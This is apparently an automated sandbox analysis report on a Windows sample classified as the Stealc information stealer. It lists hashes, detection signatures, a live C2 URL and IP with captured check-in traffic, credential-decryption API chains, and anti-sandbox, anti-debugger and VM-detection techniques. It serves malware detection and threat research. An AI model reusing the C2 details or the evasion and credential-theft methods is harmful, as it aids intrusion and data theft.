Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523652
MD5: 7c170238c3fdf496e5420134b8f2c1e6
SHA1: 45c78f3c1f17a5cb39fe957ee144b69c6fc81211
SHA256: 33cbd0e0fa5ac49cb28c3f095077c7b82cc6127d78a0024eff5e5d9f3fc12029
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7C170238C3FDF496E5420134B8F2C1E6)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6200 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6200 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.ff0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T22:16:04.772466+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.ff0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01008EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01004910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01004570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01003EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIE
    Host: 185.215.113.37
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 39 36 41 31 32 44 31 45 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a
    Data Ascii:
    ------KFBGDBFBKKJECBFHDGIE
    Content-Disposition: form-data; name="hwid"

    D596A12D1E9E487256326
    ------KFBGDBFBKKJECBFHDGIE
    Content-Disposition: form-data; name="build"

    doma
    ------KFBGDBFBKKJECBFHDGIE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIE
    Host: 185.215.113.37
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 39 36 41 31 32 44 31 45 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a
    Data Ascii:
    ------KFBGDBFBKKJECBFHDGIE
    Content-Disposition: form-data; name="hwid"

    D596A12D1E9E487256326
    ------KFBGDBFBKKJECBFHDGIE
    Content-Disposition: form-data; name="build"

    doma
    ------KFBGDBFBKKJECBFHDGIE--
Source: file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/Zg
Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpSg
Source: file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37t=

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124F86C NtOpenThread
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AF178
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013449F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013CD3CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C93C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01492AE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BDAF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C6ACD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C85BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013CADF2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BA46F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01275F3D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C0F20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012EF67F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130FE68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BFE86
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00FF45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: egzmbzjx ZLIB complexity 0.9948495546589525
Source: file.exe, 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01009600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01003720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\H6YIDDNH.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 50%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1838080 > 1048576
Source: file.exe | Static PE information: Raw size of egzmbzjx is bigger than: 0x100000 < 0x19a800

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ff0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;egzmbzjx:EW;cqfrfmzh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;egzmbzjx:EW;cqfrfmzh:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01009860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c7576 should be: 0x1d08cf
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: egzmbzjx
Source: file.exe | Static PE information: section name: cqfrfmzh
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0146A157 push 4D0B5202h; mov dword ptr [esp], eax (0_2_0146A29C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01493154 push ebx; mov dword ptr [esp], esi (0_2_014931CD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01493154 push 709336C0h; mov dword ptr [esp], esp (0_2_0149321F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AF178 push eax; mov dword ptr [esp], ecx (0_2_013AF18A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AF178 push ecx; mov dword ptr [esp], eax (0_2_013AF296)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AF178 push eax; mov dword ptr [esp], edi (0_2_013AF3B1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0145210D push 197D5D01h; mov dword ptr [esp], ebp (0_2_01452164)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D9972 push esi; mov dword ptr [esp], eax (0_2_013D99C4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D9972 push 3EC1C654h; mov dword ptr [esp], ebp (0_2_013D9A6E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D9972 push ebx; mov dword ptr [esp], 65DE6C6Eh (0_2_013D9AE5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01342964 push 09651C1Dh; mov dword ptr [esp], edi (0_2_013429AF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01342964 push eax; mov dword ptr [esp], ebx (0_2_013429B3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01400123 push edi; mov dword ptr [esp], 1B55F994h (0_2_01400145)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014C79C6 push 660EB7F4h; mov dword ptr [esp], ebx (0_2_014C7A57)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014B71E3 push 5DE817ECh; mov dword ptr [esp], ebp (0_2_014B7D59)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push ebp; mov dword ptr [esp], edi (0_2_013C49AB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push ebx; mov dword ptr [esp], ebp (0_2_013C49D0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push 23FF5AADh; mov dword ptr [esp], edx (0_2_013C4A4D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push 7D599704h; mov dword ptr [esp], ecx (0_2_013C4A5C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push ebp; mov dword ptr [esp], edx (0_2_013C4A76)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push 67B6FF43h; mov dword ptr [esp], ebx (0_2_013C4A84)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push 15D74D4Fh; mov dword ptr [esp], edx (0_2_013C4B0E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push 081B7752h; mov dword ptr [esp], ecx (0_2_013C4B32)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push edx; mov dword ptr [esp], ecx (0_2_013C4B39)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push 0CA1FD9Ah; mov dword ptr [esp], eax (0_2_013C4BB6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push 0843A9B3h; mov dword ptr [esp], esi (0_2_013C4BC6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push ecx; mov dword ptr [esp], edi (0_2_013C4BCD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push ecx; mov dword ptr [esp], 5ECC1381h (0_2_013C4C37)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push edx; mov dword ptr [esp], ebp (0_2_013C4CCA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push ebx; mov dword ptr [esp], eax (0_2_013C4D79)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4994 push eax; mov dword ptr [esp], ebx (0_2_013C4D9B)
Source: file.exe | Static PE information: section name: egzmbzjx entropy: 7.953232696533616

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01009860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13375)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D26FC second address: 13D2702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D2702 second address: 13D2708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D17EF second address: 13D17F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D17F8 second address: 13D17FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D1AEE second address: 13D1AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F8F347F9F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D1AFA second address: 13D1AFF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D2076 second address: 13D2080 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8F347F9F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D4643 second address: 13D469F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8F34B47B64h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jne 00007F8F34B47B70h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push ebx 0x0000001d push edx 0x0000001e jnl 00007F8F34B47B56h 0x00000024 pop edx 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d je 00007F8F34B47B56h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D469F second address: 13D46A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D46A3 second address: 13D472E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F8F34B47B66h 0x0000000c jmp 00007F8F34B47B60h 0x00000011 popad 0x00000012 pop eax 0x00000013 jp 00007F8F34B47B59h 0x00000019 push 00000003h 0x0000001b jmp 00007F8F34B47B5Ch 0x00000020 push 00000000h 0x00000022 mov si, 3E2Ch 0x00000026 push 00000003h 0x00000028 mov dword ptr [ebp+122D354Eh], edx 0x0000002e call 00007F8F34B47B59h 0x00000033 pushad 0x00000034 pushad 0x00000035 jmp 00007F8F34B47B64h 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d jl 00007F8F34B47B58h 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 push eax 0x00000047 push ebx 0x00000048 jp 00007F8F34B47B5Ch 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [esp+04h] 0x00000053 push eax 0x00000054 push edx 0x00000055 jl 00007F8F34B47B58h 0x0000005b push esi 0x0000005c pop esi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D472E second address: 13D4740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8F347F9F1Eh 0x00000009 rdtsc
